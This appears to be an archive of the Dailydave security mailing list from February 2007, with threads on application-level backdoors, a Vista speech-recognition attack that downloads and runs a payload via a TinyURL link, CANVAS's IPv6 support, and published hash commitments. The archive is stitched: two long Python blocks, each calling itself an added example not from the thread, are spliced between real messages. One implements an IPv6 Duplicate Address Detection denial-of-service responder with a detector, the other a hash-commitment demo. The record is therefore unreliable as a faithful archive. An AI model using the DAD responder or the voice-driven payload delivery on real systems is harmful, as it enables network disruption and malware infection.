From krahmer at suse.de Thu Feb 1 04:30:28 2007
From: krahmer at suse.de (Sebastian Krahmer)
Date: Thu, 1 Feb 2007 10:30:28 +0100 (CET)
Subject: [Dailydave] On "Application Level Rootkits"

On Wed, 31 Jan 2007, LMH wrote:

I just wrote down some thoughts about curious backdoors a few days ago:

http://c-skills.blogspot.com/2007/01/good-side-of-spam.html

The syslog backdoor exists and is straightforward, but I don't know how to do the tabs properly within the blog :)

Sebastian

> I'm curious if someone else has ever done work around a PHP extension backdoor. I've been checking code around and it seems to be a nice possibility.
>
> Drop the extension and have the target host send a blue haired Goatse image when a specific token is passed via the query string to any PHP script. Or something else more fruitful.
>
> -- Lance.
> _______________________________________________
> Dailydave mailing list
> Dailydave at lists.immunitysec.com
> http://lists.immunitysec.com/mailman/listinfo/dailydave

-- 
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~

From george_ou at lanarchitect.net Thu Feb 1 05:04:58 2007
From: george_ou at lanarchitect.net (George Ou)
Date: Thu, 1 Feb 2007 02:04:58 -0800
Subject: [Dailydave] Vista speech recognition

Rich verified it will work and you can execute code. So long as you stay in the user-realm, you won't trigger UAC, which cannot be bypassed "by default" as Microsoft says.
-----Original Message-----
From: Sebastian Krahmer [mailto:krahmer at suse.de]
Sent: Thursday, February 01, 2007 1:32 AM
To: George Ou
Cc: dailydave at lists.immunitysec.com; 'Rich Mogull'
Subject: RE: [Dailydave] Vista speech recognition

On Wed, 31 Jan 2007, George Ou wrote:

So we do not know yet whether dl'ing and executing user-level binaries works? Or does it not work (according to previous mail)?

Sebastian

> Doh! Maybe it was the right assumption that UAC isn't triggered on user-level executables. I need to verify but need to wait till I rebuild my Vista system. If anyone can verify this while my Vista system is being repaired, much appreciated.
>
> -----Original Message-----
> From: George Ou [mailto:george_ou at lanarchitect.net]
> Sent: Wednesday, January 31, 2007 11:26 AM
> To: 'Sebastian Krahmer'; 'dailydave at lists.immunitysec.com'; 'Rich Mogull'
> Subject: RE: [Dailydave] Vista speech recognition
>
> Ah, I made a wrong assumption. Any executable you launch, regardless of whether it attempts to access system files or not, will trigger UAC.
>
> The file deletion concept still works though.
>
> George
>
> -----Original Message-----
> From: George Ou [mailto:george_ou at lanarchitect.net]
> Sent: Wednesday, January 31, 2007 3:09 AM
> To: 'Sebastian Krahmer'; 'dailydave at lists.immunitysec.com'; 'Rich Mogull'
> Subject: RE: [Dailydave] Vista speech recognition
>
> I just verified that TinyURL.com will give you a nice URL to an executable.
>
> Here's an example of a URL that opens a .EXE file.
> http://tinyurl.com/3d588b
>
> Now imagine that this was actually a user-mode malicious payload that avoids triggering UAC which contains ransomware. It's very easy to use Vista speech command to open IE7 and say "tinyURL.com/3d588b", "enter", "run". That will actually download and launch your desired payload from any website, and TinyURL will make it easy to say.
> This is actually easier than my successful document-deleting recycle bin emptying test because it's a shorter script.
>
> George

-- 
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~

From krahmer at suse.de Thu Feb 1 05:09:38 2007
From: krahmer at suse.de (Sebastian Krahmer)
Date: Thu, 1 Feb 2007 11:09:38 +0100 (CET)
Subject: [Dailydave] Vista speech recognition

On Thu, 1 Feb 2007, George Ou wrote:

BTW, is there a specification of which actions by a binary will trigger UAC? Opening sockets? Executing a command shell? UAC might be bypassed as well; remember all the kernel-level exploits for Linux, there might be similar ones for Win.

Sebastian

> Rich verified it will work and you can execute code. So long as you stay in the user-realm, you won't trigger UAC, which cannot be bypassed "by default" as Microsoft says.
>
> -----Original Message-----
> From: Sebastian Krahmer [mailto:krahmer at suse.de]
> Sent: Thursday, February 01, 2007 1:32 AM
> To: George Ou
> Cc: dailydave at lists.immunitysec.com; 'Rich Mogull'
> Subject: RE: [Dailydave] Vista speech recognition
>
> On Wed, 31 Jan 2007, George Ou wrote:
>
> So we do not know yet whether dl'ing and executing user-level binaries works? Or does it not work (according to previous mail)?
>
> Sebastian
>
> > Doh! Maybe it was the right assumption that UAC isn't triggered on user-level executables. I need to verify but need to wait till I rebuild my Vista system. If anyone can verify this while my Vista system is being repaired, much appreciated.
> >
> > -----Original Message-----
> > From: George Ou [mailto:george_ou at lanarchitect.net]
> > Sent: Wednesday, January 31, 2007 11:26 AM
> > To: 'Sebastian Krahmer'; 'dailydave at lists.immunitysec.com'; 'Rich Mogull'
> > Subject: RE: [Dailydave] Vista speech recognition
> >
> > Ah, I made a wrong assumption. Any executable you launch, regardless of whether it attempts to access system files or not, will trigger UAC.
> >
> > The file deletion concept still works though.
> >
> > George
> >
> > -----Original Message-----
> > From: George Ou [mailto:george_ou at lanarchitect.net]
> > Sent: Wednesday, January 31, 2007 3:09 AM
> > To: 'Sebastian Krahmer'; 'dailydave at lists.immunitysec.com'; 'Rich Mogull'
> > Subject: RE: [Dailydave] Vista speech recognition
> >
> > I just verified that TinyURL.com will give you a nice URL to an executable.
> >
> > Here's an example of a URL that opens a .EXE file.
> > http://tinyurl.com/3d588b
> >
> > Now imagine that this was actually a user-mode malicious payload that avoids triggering UAC which contains ransomware. It's very easy to use Vista speech command to open IE7 and say "tinyURL.com/3d588b", "enter", "run". That will actually download and launch your desired payload from any website, and TinyURL will make it easy to say. This is actually easier than my successful document-deleting recycle bin emptying test because it's a shorter script.
> >
> > George
>
> -- 
> ~
> ~ perl self.pl
> ~ $_='print"\$_=\47$_\47;eval"';eval
> ~ krahmer at suse.de - SuSE Security Team
> ~

-- 
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~

From juha-matti.laurio at netti.fi Thu Feb 1 11:29:21 2007
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Date: Thu, 1 Feb 2007 18:29:21 +0200 (EET)
Subject: [Dailydave] Vista speech recognition

Microsoft has released its response at MSRC Blog now.

Link:
http://blogs.technet.com/msrc/archive/2007/01/31/issue-regarding-windows-vista-speech-recognition.aspx

- Juha-Matti

From lcamtuf at dione.ids.pl Thu Feb 1 13:43:04 2007
From: lcamtuf at dione.ids.pl (Michal Zalewski)
Date: Thu, 1 Feb 2007 19:43:04 +0100 (CET)
Subject: [Dailydave] Vista speech recognition

On Thu, 1 Feb 2007, Juha-Matti Laurio wrote:

> http://blogs.technet.com/msrc/archive/2007/01/31/issue-regarding-windows-vista-speech-recognition.aspx

I find this kind of bogus. Voice recognition systems don't compare raw waveforms. Most of the information is discarded: they usually isolate a fraction of the signal, normalize it, chop it into discrete bits that best reflect changes in voice modulation or whatnot, then feed it to an HMM analyzer or some other ANN. This is heavily optimized based on various assumptions about how human speech sounds, and what ambient noises might look like.

What this means is that it is in all likelihood possible to produce a waveform that will be impossible to interpret for a human (either because it is masked by a superimposed signal, or because it does not resemble speech in the first place), but will be "heard" as meaningful words by Vista.
So you get eerie industrial background music and noises on a website, instead of a dude reading out loud "my documents, delete, yes". Heck, this happens spontaneously: speech recognition systems sometimes pick up random burps and crashes from the environment and map them to dictionary words.

And wasn't there an early demo for Vista speech recognition that wasn't trained for that particular salesdude, and kept hearing "dear aunt double the killer" instead of what he was saying? Oh yeah:

http://video.google.com/videoplay?docid=-1123221217782777472

Now, I bet that MSRC dudes are well aware of this possibility, but chose not to mention it. Eh.

/mz

From ken.buchanan at gmail.com Thu Feb 1 14:07:54 2007
From: ken.buchanan at gmail.com (Ken Buchanan)
Date: Thu, 1 Feb 2007 14:07:54 -0500
Subject: [Dailydave] Vista speech recognition

From MS: "Of course this would be heard and the actions taken would be visible to the user if they were in front of the PC during the attempted exploitation."

Bah. I bet some degree of stealth could be worked into this if someone tried hard enough.

The most obvious method won't work: emitting sound outside the range of human hearing. The intersection of the sets of frequencies that a normal microphone will detect, a normal speaker will emit, and human ears won't detect is null.

There are other avenues that would have to be explored experimentally. How much can you speed up or slow down the words and have the recognition still work? What about overlaying the commands on music? Can we take advantage of psychoacoustics to disguise some of the phonemes, so an unalert user might not notice their presence?

I just wouldn't assume this is inherently non-stealthy.
- Ken

On 2/1/07, Juha-Matti Laurio wrote:
> Microsoft has released its response at MSRC Blog now.
>
> Link:
> http://blogs.technet.com/msrc/archive/2007/01/31/issue-regarding-windows-vista-speech-recognition.aspx
>
> - Juha-Matti

From dave at immunityinc.com Thu Feb 1 15:26:16 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Thu, 01 Feb 2007 15:26:16 -0500
Subject: [Dailydave] IPv6, CANVAS, The Love.

As of today, Immunity CANVAS is now the only penetration testing platform that can handle IPv6. You know you're excited! What about all those IPv6 DoD networks you can test now?

A Flash movie of CANVAS targeting a Windows 2003 SP0 machine via IPv6 from a Windows XP machine. Our very own Bas Alberts owns the Windows 2003 server, then runs a "dir" command, gets a screenshot, and celebrates in true Immunity style.

http://www.immunityinc.com/documentation/ipv6.html

A screenshot of CANVAS 6.19 attacking over IPv6 from Linux.

http://www.immunityinc.com/images/ipv6.png

Vista, of course, includes IPv6 by default. Vista Ultimate is now my recommended platform for Windows people running exploits thanks to a non-handicapped TCP/IP stack (and the almost as pretty as Beryl user interface!).

Bonus: The VisualSploit screenshot I promised while in Singapore. Truly a fun bug to exploit with VisualSploit. It's just that easy!
http://www.immunityinc.com/images/VS_Screenshot.png

-dave

From dentonj at gmail.com Thu Feb 1 19:12:21 2007
From: dentonj at gmail.com (Jeffrey Denton)
Date: Fri, 2 Feb 2007 01:12:21 +0100
Subject: [Dailydave] IPv6, CANVAS, The Love.

On 2/1/07, Dave Aitel wrote:
> As of today, Immunity CANVAS is now the only penetration testing platform that can handle IPv6. You know you're excited! What about all those IPv6 DoD networks you can test now?

Does CANVAS have any IPv6-specific attacks? Even something as lame as a DoS against Duplicate Address Detection?

Victim: Anyone using this address? (Neighbor Solicitation)
CANVAS: Yeap! (Neighbor Advertisement)
Victim: How about this one?
CANVAS: Got it.
Victim: And this one?
CANVAS: Try again.

From robert_david_graham at yahoo.com Thu Feb 1 21:44:12 2007
From: robert_david_graham at yahoo.com (Robert Graham)
Date: Thu, 1 Feb 2007 18:44:12 -0800 (PST)
Subject: [Dailydave] IPv6, CANVAS, The Love.

--- Dave Aitel wrote:
> A Flash movie of CANVAS targeting a Windows 2003 SP0 machine via IPv6 from a Windows XP machine. Our very own Bas Alberts owns the Windows 2003 server, then runs a "dir" command, gets a screenshot, and celebrates in true Immunity style.

Packet-caps or it didn't happen. :-)
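The exchange Jeffrey Denton sketches above (a Neighbor Solicitation for each tentative address, answered every time with a Neighbor Advertisement) written out as a worked example. This is added here; it is not code from the thread or from CANVAS. It builds both messages per the RFC 4861 layout and the RFC 4862 DAD rules (source ::, no source link-layer option, reply to all-nodes with S=0), runs the "Yeap! Got it." responder against a constructed capture, and adds the check a defender would want: a detector that flags a single link-layer address claiming every address that other hosts were probing for. The addresses and the MAC are made up, and everything runs offline against byte strings; putting packets on a real link would need raw sockets, which is not shown.

```python
"""IPv6 Duplicate Address Detection (DAD) exchange, simulated offline.
Added example, not from the thread or CANVAS. Layouts: RFC 4861 (ND), RFC 4862 (DAD).
Every address and MAC here is made up."""
import ipaddress
import struct
from collections import defaultdict

ICMPV6_NS, ICMPV6_NA = 135, 136
UNSPECIFIED = ipaddress.IPv6Address("::")
ALL_NODES = ipaddress.IPv6Address("ff02::1")

def icmpv6_checksum(src, dst, msg):
    """RFC 4443 checksum: pseudo-header (src, dst, length, next header 58) + message.
    Returns 0 when `msg` already carries a correct checksum, so it doubles as a verifier."""
    data = src.packed + dst.packed + struct.pack("!I3xB", len(msg), 58) + msg
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def solicited_node(target):
    """ff02::1:ffXX:XXXX from the low 24 bits of the target (RFC 4291 2.7.1)."""
    low24 = int(ipaddress.IPv6Address(target)) & 0xFFFFFF
    return ipaddress.IPv6Address(int(ipaddress.IPv6Address("ff02::1:ff00:0")) | low24)

def finish(src, dst, body):
    """Write the checksum into bytes 2-3 and return the (src, dst, msg) triple."""
    csum = icmpv6_checksum(src, dst, body)
    return src, dst, body[:2] + struct.pack("!H", csum) + body[4:]

def build_dad_probe(target):
    """Victim: NS for a tentative address. Source is :: and no source link-layer
    option is allowed (RFC 4862 5.4.2); destination is the solicited-node group."""
    target = ipaddress.IPv6Address(target)
    body = struct.pack("!BBHI", ICMPV6_NS, 0, 0, 0) + target.packed
    return finish(UNSPECIFIED, solicited_node(target), body)

def build_na_claim(target, mac):
    """Replier: NA saying `target` is in use at `mac`. Answering an unspecified
    solicitor needs S=0 and destination ff02::1 (RFC 4861 7.2.4); O=1 is set."""
    target = ipaddress.IPv6Address(target)
    flags = 0x20000000                              # R=0 S=0 O=1 + 29 reserved bits
    tlla = struct.pack("!BB", 2, 1) + mac           # Target Link-Layer Address option
    body = struct.pack("!BBHI", ICMPV6_NA, 0, 0, flags) + target.packed + tlla
    return finish(target, ALL_NODES, body)          # claimant sources from the address it claims

def parse_nd(src, dst, msg):
    """Verify checksum, return (type, target, link-layer address from a type 1/2 option or None)."""
    if len(msg) < 24 or icmpv6_checksum(src, dst, msg) != 0:
        raise ValueError("short ND message or bad ICMPv6 checksum")
    lla, pos = None, 24
    while pos + 8 <= len(msg):                      # options: type, length in 8-byte units
        otype, olen = msg[pos], msg[pos + 1]
        if olen == 0:
            raise ValueError("zero-length ND option")    # RFC 4861 4.6: MUST discard
        if otype in (1, 2) and olen == 1:
            lla = msg[pos + 2:pos + 8]
        pos += olen * 8
    return msg[0], ipaddress.IPv6Address(msg[8:24]), lla

def dad_dos_responder(src, dst, msg, mac):
    """The 'Yeap! Got it.' side: any DAD probe seen gets a claim for its target."""
    typ, target, _ = parse_nd(src, dst, msg)
    if typ == ICMPV6_NS and src == UNSPECIFIED:
        return build_na_claim(target, mac)
    return None

def detect_dad_dos(capture, threshold=3):
    """Detector: one link-layer address 'owning' more than `threshold` distinct addresses
    that others were probing for. Returns {mac: claimed-target count} for offenders."""
    probed, claims = set(), defaultdict(set)
    for src, dst, msg in capture:
        typ, target, lla = parse_nd(src, dst, msg)
        if typ == ICMPV6_NS and src == UNSPECIFIED:
            probed.add(target)
        elif typ == ICMPV6_NA and target in probed and lla is not None:
            claims[lla].add(target)
    return {mac.hex(":"): len(t) for mac, t in claims.items() if len(t) > threshold}

def simulate(attempts=4):
    """Victim tries `attempts` tentative addresses, the responder claims each one.
    Returns the constructed capture and the detector's verdict on it."""
    attacker_mac = bytes.fromhex("02dead00beef")
    base = int(ipaddress.IPv6Address("fe80::211:22ff:fe33:4400"))
    capture = []
    for i in range(1, attempts + 1):
        probe = build_dad_probe(ipaddress.IPv6Address(base + i))
        capture.append(probe)
        claim = dad_dos_responder(*probe, mac=attacker_mac)
        if claim is not None:
            capture.append(claim)
    return capture, detect_dad_dos(capture)

if __name__ == "__main__":
    cap, verdict = simulate()
    print(len(cap), "packets;", verdict)    # 8 packets; {'02:de:ad:00:be:ef': 4}
```

The detector keys on the behaviour rather than on any particular payload: a legitimate host answers a DAD probe only for an address it actually holds, so one MAC "owning" several addresses that different hosts were just trying to configure is the signature. The threshold is there because a router or a host with a handful of addresses can legitimately answer a few probes.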
From george_ou at lanarchitect.net Fri Feb 2 04:04:14 2007
From: george_ou at lanarchitect.net (George Ou)
Date: Fri, 2 Feb 2007 01:04:14 -0800
Subject: [Dailydave] Vista speech recognition

Here's the round-up of news coverage on this flaw.
http://blogs.techrepublic.com.com/Ou/?p=420
http://blogs.zdnet.com/Ou/?p=420

"The fundamental problem here is that Microsoft "extended" speech to be able to control the Operating System and Applications without considering the full security implications. If Microsoft had merely assigned a user-defined password with an automatic lockout after a certain amount of idle time, it would have made the generic attack impossible, but they failed to do that. So I'm asking Microsoft to reconsider their stance that "there is little if any need to worry" and implement some sort of safety mechanism rather than relying on the user to be self-vigilant. It doesn't matter that there aren't that many people using this feature; Microsoft should fix it if they're going to offer it and market it as a key Vista advantage. Since Microsoft is promoting voice recognition for healthcare, we should consider the safety of patient health records.

At present time, Vista Speech Recognition wakes up to the command "start listening". How hard would it be for Microsoft to make that a user-definable phrase or word? For example: a user would pick "Zelda" as the word to wake speech mode while someone else picks "439" as their wake word. How hard would it be for Microsoft to implement a wake timeout so that Speech Recognition would sleep after 5 minutes idle?
How hard would it be for Microsoft to implement their excellent echo cancellation algorithm in Windows Messenger for Speech Recognition? I don't believe this is too much to ask."

I want to thank the SANS Institute guys for "getting it". Coming from them, that means something to me.

I'm also running a poll at the end asking if Microsoft should patch this with a pass phrase and echo cancellation.

George Ou

From krahmer at suse.de Fri Feb 2 04:48:29 2007
From: krahmer at suse.de (Sebastian Krahmer)
Date: Fri, 2 Feb 2007 10:48:29 +0100 (CET)
Subject: [Dailydave] Vista speech recognition

On Fri, 2 Feb 2007, George Ou wrote:

Hi,

I think it's a quite normal reflex to decrease the importance of such bugs. If it's an IE7 instant high-tech remote, you have little chance to say 'not so important'. If it has some sort of fun-factor and some laughs, it's easier to say 'yes, but not serious'. At least until you realize that all your firewalls, IDS and whatnot did not protect you.

On the other hand, I do not really care what the "official" severity is. Maybe, in 20 years, if all computers are controlled by expressions, speech and gestures, such "exploits" become common; and this one was the first of this kind. Let's see how it develops ;-)

thanks for the effort,
Sebastian

> Here's the round-up of news coverage on this flaw.
> http://blogs.techrepublic.com.com/Ou/?p=420
> http://blogs.zdnet.com/Ou/?p=420
>
> "The fundamental problem here is that Microsoft "extended" speech to be able to control the Operating System and Applications without considering the full security implications.
> If Microsoft had merely assigned a user-defined password with an automatic lockout after a certain amount of idle time, it would have made the generic attack impossible, but they failed to do that. So I'm asking Microsoft to reconsider their stance that "there is little if any need to worry" and implement some sort of safety mechanism rather than relying on the user to be self-vigilant. It doesn't matter that there aren't that many people using this feature; Microsoft should fix it if they're going to offer it and market it as a key Vista advantage. Since Microsoft is promoting voice recognition for healthcare, we should consider the safety of patient health records.
>
> At present time, Vista Speech Recognition wakes up to the command "start listening". How hard would it be for Microsoft to make that a user-definable phrase or word? For example: a user would pick "Zelda" as the word to wake speech mode while someone else picks "439" as their wake word. How hard would it be for Microsoft to implement a wake timeout so that Speech Recognition would sleep after 5 minutes idle? How hard would it be for Microsoft to implement their excellent echo cancellation algorithm in Windows Messenger for Speech Recognition? I don't believe this is too much to ask."
>
> I want to thank the SANS Institute guys for "getting it". Coming from them, that means something to me.
>
> I'm also running a poll at the end asking if Microsoft should patch this with a pass phrase and echo cancellation.
>
> George Ou

-- 
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~

From dave.aitel at gmail.com Fri Feb 2 08:45:24 2007
From: dave.aitel at gmail.com (Dave Aitel)
Date: Fri, 2 Feb 2007 08:45:24 -0500
Subject: [Dailydave] Vista speech recognition

This thread is now dead. It's terrible publicity for Microsoft, since it's the exact thing they don't want to say. "Our uninspired OS has vulnerabilities the OS X people already fixed". Essentially it overrides the Microsoft marketing message since there's nothing tangible about Vista Ultimate to sell. "Search", "Voice", "Security" are the "three killer features", but as John Stewart said when he interviewed Bill Gates, "Is this just about how we interact with computers or do they DO anything new?"

People in America like to name things as the opposite of what they are. "The Patriot Act", "The War on Terror", "Vista Ultimate", "Digital Rights Management" etc. Vista isn't the last OS you're ever going to buy, so why name it like it is? That was a rhetorical question, for all the non-exploit-writing people out there who feel the need to say something on a mailing list to get their name in their own inbox. The point is the name makes it sound really cool, but anyone who's used it is like "eh?". It's better than XP, but Ubuntu is better than both of them, so whatever.

Anyways, this is about as bad as it's going to get for Vista. Nobody is going to publicly announce vulnerabilities for it. Instead, they'll sell them and/or use them. Atlas shrugged a long time ago and the security industry is just now noticing.

-dave

On 2/2/07, George Ou wrote:
>
> Here's the round-up of news coverage on this flaw.
> http://blogs.techrepublic.com.com/Ou/?p=420
> http://blogs.zdnet.com/Ou/?p=420
>
> "The fundamental problem here is that Microsoft "extended" speech to be able to control the Operating System and Applications without considering the full security implications. If Microsoft had merely assigned a user-defined password with an automatic lockout after a certain amount of idle time, it would have made the generic attack impossible, but they failed to do that. So I'm asking Microsoft to reconsider their stance that "there is little if any need to worry" and implement some sort of safety mechanism rather than relying on the user to be self-vigilant. It doesn't matter that there aren't that many people using this feature; Microsoft should fix it if they're going to offer it and market it as a key Vista advantage. Since Microsoft is promoting voice recognition for healthcare, we should consider the safety of patient health records.
>
> At present time, Vista Speech Recognition wakes up to the command "start listening". How hard would it be for Microsoft to make that a user-definable phrase or word? For example: a user would pick "Zelda" as the word to wake speech mode while someone else picks "439" as their wake word. How hard would it be for Microsoft to implement a wake timeout so that Speech Recognition would sleep after 5 minutes idle? How hard would it be for Microsoft to implement their excellent echo cancellation algorithm in Windows Messenger for Speech Recognition? I don't believe this is too much to ask."
>
> I want to thank the SANS Institute guys for "getting it". Coming from them, that means something to me.
>
> I'm also running a poll at the end asking if Microsoft should patch this with a pass phrase and echo cancellation.
>
> George Ou

From ari.takanen at codenomicon.com Fri Feb 2 09:53:49 2007
From: ari.takanen at codenomicon.com (Ari Takanen)
Date: Fri, 2 Feb 2007 16:53:49 +0200
Subject: [Dailydave] IPv6, CANVAS, The Love.

Hello all,

On Fri, Feb 02, 2007 at 07:44:33AM -0500, dailydave-request at lists.immunitysec.com wrote:
> As of today, Immunity CANVAS is now the only penetration testing platform that can handle IPv6. You know you're excited! What about all those IPv6 DoD networks you can test now?

I do not usually want to promote our tools (too much) but wanted to respond to the advertisement by Immunity.

Codenomicon has probably been the first to cover every single protocol (100+ interfaces supported), and IPv6 is not an exception (well, PROTOS did some of the protocols before us, but that does not count because we kind of are the same thing as the PROTOS Classic test suites [1]). Codenomicon has done security testing of IPv6 for a long time already. Also most if not all Codenomicon tools are IPv6 capable. In fact we (or our customers to be more exact) can find zero-day flaws in almost any IPv6 device.

[1] http://www.codenomicon.com/media/press-releases/2007-01-09.shtml

/Ari

-- 
Ari Takanen
Codenomicon Ltd.
ari.takanen at codenomicon.com
Tutkijantie 4E, FIN-90570 Oulu, Finland
tel: +358-40 50 67678
http://www.codenomicon.com
PGP: http://www.codenomicon.com/codenomicon-key.asc

From dave at immunityinc.com Fri Feb 2 11:41:08 2007
From: dave at immunityinc.com (Dave Aitel)
Date: Fri, 02 Feb 2007 11:41:08 -0500
Subject: [Dailydave] IPv6, CANVAS, The Love.

I'm a big fan of fuzzers, but fuzzers and attack frameworks are two different things. I'm sure Codenomicon/PROTOS, MU, Breakingpoint, ProtoVer, SPIKE2K6 and various other fuzzers all support IPv6 or protocols that run over IPv6, but once they find a vulnerability, you would then plug that into CANVAS or another attack framework to target someone's machine. So two sides of the same coin, as it were. Apples and Orangutans. NP Complete and O(1). And so on.

I'm sure you're just feigning confusion here, but I wanted to make sure you didn't induce real confusion in anyone reading this list... which is unlikely, except after yesterday's press coverage there's 1000 new people subscribed who might be CNN-type readers. They'll all unsubscribe when they realize this list is mostly about breaking into computers the hard way - where EIP is involved.

Being first is silly anyways. Everyone's first at something. The Zune is the top seller in the category of 30gig mp3 players that are also brown, but it sold like 5 units and the Microsoft guy in charge of that marketing had to leave for "personal reasons". There's no one best fuzzer; that's the beauty of the beast.
-dave

Ari Takanen wrote:
> Hello all,
>
> On Fri, Feb 02, 2007 at 07:44:33AM -0500, dailydave-request at lists.immunitysec.com wrote:
>> As of today, Immunity CANVAS is now the only penetration testing platform that can handle IPv6. You know you're excited! What about all those IPv6 DoD networks you can test now?
>
> I do not usually want to promote our tools (too much) but wanted to respond to the advertisement by Immunity.
>
> Codenomicon has probably been the first to cover every single protocol (100+ interfaces supported), and IPv6 is not an exception (well, PROTOS did some of the protocols before us, but that does not count because we kind of are the same thing as the PROTOS Classic test suites [1]). Codenomicon has done security testing of IPv6 for a long time already. Also most if not all Codenomicon tools are IPv6 capable. In fact we (or our customers to be more exact) can find zero-day flaws in almost any IPv6 device.
>
> [1] http://www.codenomicon.com/media/press-releases/2007-01-09.shtml
>
> /Ari

From dave.aitel at gmail.com Sun Feb 4 14:32:32 2007
From: dave.aitel at gmail.com (Dave Aitel)
Date: Sun, 4 Feb 2007 14:32:32 -0500
Subject: [Dailydave] Superbowl sunday

View into Miami - outlook foggy, like Vista's ASLR implementation.

http://picasaweb.google.com/dave.aitel/Superbowl/photo#5027752094863004162
From HalVar at gmx.de Mon Feb 5 08:11:30 2007
From: HalVar at gmx.de (Halvar Flake)
Date: Mon, 05 Feb 2007 14:11:30 +0100
Subject: [Dailydave] Some Sums

Hey all,

for lack of a better place, I would like to post the following hash values:

MD5Sum:
5e5ed3b92b2abbcc1adaa18cc0ca6aaf

SHA1sum:
FFECBE21E3EC93A5AC2B94889AD2967881398A9C

Cheers,
Halvar

From dave.korn at artimi.com Mon Feb 5 09:37:42 2007
From: dave.korn at artimi.com (Dave Korn)
Date: Mon, 5 Feb 2007 14:37:42 -0000
Subject: [Dailydave] Some Sums

On 05 February 2007 13:12, Halvar Flake wrote:

> Hey all,
>
> for lack of a better place, I would like to post the following hash values:
>
> MD5Sum:
> 5e5ed3b92b2abbcc1adaa18cc0ca6aaf
>
> SHA1sum:
> FFECBE21E3EC93A5AC2B94889AD2967881398A9C
>
> Cheers,
> Halvar

I take it that's going to be the hash of some file or other data you're going to produce for someone at some time in the future? Couldn't you just have used a ZK protocol and left us all out of it? ;-) If you're going to use our inboxes as substitutes for escrow/notarisation centres, you could perhaps tell us just a little bit more about what you're doing!

cheers,
DaveK

-- 
Can't think of a witty .sigline today....
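What Halvar posted, and what Dave Korn is asking about, is a commit/reveal scheme: publish a digest now, the document later, and let the list archive supply the timestamp. The following is an added example, not code from anyone on the thread. It implements commit and reveal with the two digests Halvar used plus SHA-256, checks every published digest on reveal, and shows the caveat a practitioner wants to know about: a bare md5sum/sha1sum of a short, guessable claim does not hide it (a dictionary of candidate claims recovers it), whereas a random nonce committed alongside the document does. The candidate claims are constructed for the demo and correspond to nothing real.

```python
"""Hash commitment of the 'post the digests now, the document later' kind used in the thread.
Added example, not code from the list. Shows the two properties the scheme needs (hiding and
binding) and where a bare md5sum/sha1sum of a file falls short on the first one."""
import hashlib
import hmac
import secrets

ALGOS = ("md5", "sha1", "sha256")   # the two the thread posted, plus a current one

def digests(data):
    """Hex digests of `data` under every algorithm in ALGOS."""
    return {name: hashlib.new(name, data).hexdigest() for name in ALGOS}

def commit(document, nonce=None):
    """Commit to `document`. Publish the returned digests; keep `nonce` with the document.
    The nonce makes the commitment hiding even when the document itself is guessable."""
    if nonce is None:
        nonce = secrets.token_bytes(32)
    return digests(nonce + document), nonce

def reveal_ok(document, nonce, published):
    """Verifier side: recompute every digest the committer published and compare them all.
    Binding rests on collision resistance, so one weak digest (MD5 collisions were public
    by 2004) only counts for something if the others are checked as well."""
    if not published:
        return False
    recomputed = digests(nonce + document)
    return all(hmac.compare_digest(recomputed.get(name, ""), value)
               for name, value in published.items())

def guess_bare_digest(published, candidates):
    """Dictionary attack on an unsalted digest: return the candidate that matches, if any."""
    if not published:
        return None
    for cand in candidates:
        if all(hmac.compare_digest(hashlib.new(name, cand).hexdigest(), value)
               for name, value in published.items()):
            return cand
    return None

# Constructed sample claims; short, predictable text is exactly what a bare digest does not hide.
CANDIDATE_CLAIMS = [
    b"Product X: remote code execution in the IPv6 stack",
    b"Product X: local privilege escalation via the installer",
    b"Product Y: authentication bypass in the admin console",
]

def demo():
    """Bare digest vs. salted commitment of the same secret claim.
    Returns (recovered_from_bare, recovered_from_salted, honest_reveal_ok, altered_reveal_ok)."""
    secret = CANDIDATE_CLAIMS[1]
    bare = digests(secret)                                        # what `md5sum f; sha1sum f` gives away
    from_bare = guess_bare_digest(bare, CANDIDATE_CLAIMS)         # -> the secret claim
    published, nonce = commit(secret)
    from_salted = guess_bare_digest(published, CANDIDATE_CLAIMS)  # -> None, the nonce blocks the guess
    altered = secret.replace(b"local", b"remote")                 # committer tries to change the story
    return (from_bare, from_salted,
            reveal_ok(secret, nonce, published),
            reveal_ok(altered, nonce, published))

if __name__ == "__main__":
    print(demo())
```

The nonce has to be stored with the document until the reveal; lose it and the published digests verify nothing. For a full write-up with detail the guessing attack is not realistic and a bare digest is fine as far as hiding goes, which is presumably Halvar's situation; the example matters when what is committed is a one-line claim. Neither form proves when the commitment was made, which is the part a publicly archived list provides.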
From HalVar at gmx.de Mon Feb 5 10:22:44 2007
From: HalVar at gmx.de (Halvar Flake)
Date: Mon, 05 Feb 2007 16:22:44 +0100
Subject: [Dailydave] Some Sums

Hey all,

apologies for having taken up space in your inboxes. There will be a followup to this mail once I can confirm that the stuff I have hashed is not bogus - with the original file. This might take a few months though - if it was easily confirmed, I would have posted results instead of hashes.

Concerning using your inboxes: Dailydave is a pretty important list, and as such, people on this list are likely competent and trustworthy - who would be better suited for notarisation of vulnerability information than this list here? And where would one find a similarly large group of professionals that could act as witness?

I admit that strictly speaking I have abused DD with the last mail. What about a general, publicly archived mailing list where people can post hashes of results to follow up later? Anyone who has read the matasano blog recently (Ptacek/Rutkowska debate) would tend to agree that we need something like this.

If people actually follow up with the originals of their hashes a few months (or a year) later, such a list might be hugely interesting. Even if they just follow up with "the contents of the document with xxx are flawed, and I withdraw the hash".

Anybody up for setting up such a list?

Anyhow, apologies for wasting your disk space - I will look for a better forum in the future. Full-disclosure maybe? It seems to be a widely-archived write-only-medium anyhow.

Cheers,
Halvar
